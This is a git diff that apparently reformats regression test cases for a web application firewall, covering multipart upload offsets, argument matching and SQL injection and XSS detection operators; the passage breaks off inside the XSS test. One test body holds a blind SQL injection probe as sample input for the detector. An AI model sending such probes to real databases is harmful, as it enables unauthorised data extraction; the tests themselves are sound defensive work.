@@ -1841,54 +2350,63 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_FILENAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,20v680,20t:trim" + "expected": { + "error_log": "o0,20v680,20t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1896,54 +2414,63 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - MULTIPART_NAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - MULTIPART_NAME", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "624", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" + }, + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" ] }, - "expected":{ - "error_log":"o0,16v709,16t:trim" + "expected": { + "error_log": "o0,16v709,16t:trim", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRequestBodyAccess On", "SecUploadKeepFiles On", "SecUploadDir /tmp", @@ -1951,63 +2478,87 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS n", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o0,1v42,1" + "expected": { + "error_log": "o0,1v42,1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains 6\" \"id:1,phase:2,deny,status:403,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable offset - ARGS_NAMES n", - "request":{ - "headers":{ - "Host":"localhost", - "Content-Length": "27", + "enabled": 1, + "version_min": 300000, + "title": "Variable offset - ARGS_NAMES n", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/index.html?param01=5555&bbbbbbbmy_id=6", - "method":"GET" + "uri": "/index.html?param01=5555&bbbbbbbmy_id=6", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 403, - "error_log":"o7,5v29,12" + "expected": { + "error_log": "o7,5v29,12", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS_NAMES \"@contains my_id\" \"id:1,phase:2,deny,status:403,log\"" ] diff --git a/test/test-cases/regression/operator-UnconditionalMatch.json b/test/test-cases/regression/operator-UnconditionalMatch.json index 5f73a2ec2e..babba6d509 100644 --- a/test/test-cases/regression/operator-UnconditionalMatch.json +++ b/test/test-cases/regression/operator-UnconditionalMatch.json @@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @UnconditionalMatch", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @UnconditionalMatch", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Rule returned 1" + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@UnconditionalMatch\" \"id:1,phase:2,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectsqli.json b/test/test-cases/regression/operator-detectsqli.json index e2e33c908f..657bdf3884 100644 --- a/test/test-cases/regression/operator-detectsqli.json +++ b/test/test-cases/regression/operator-detectsqli.json @@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectSQLi", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectSQLi", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "61", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=ascii(substring(version() from 1 for 1))¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Added DetectSQLi match TX.0: f\\(f\\(f" + "expected": { + "debug_log": "Added DetectSQLi match TX.0: f\\(f\\(f", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@detectSQLi\" \"id:1,phase:2,capture,pass,t:trim\"" ] diff --git a/test/test-cases/regression/operator-detectxss.json b/test/test-cases/regression/operator-detectxss.json index e2590193b0..9e6fa24b21 100644 --- a/test/test-cases/regression/operator-detectxss.json +++ b/test/test-cases/regression/operator-detectxss.json @@ -1,44 +1,46 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Operator :: @detectXSS", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Operator :: @detectXSS", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "27", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "45", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ - "param1=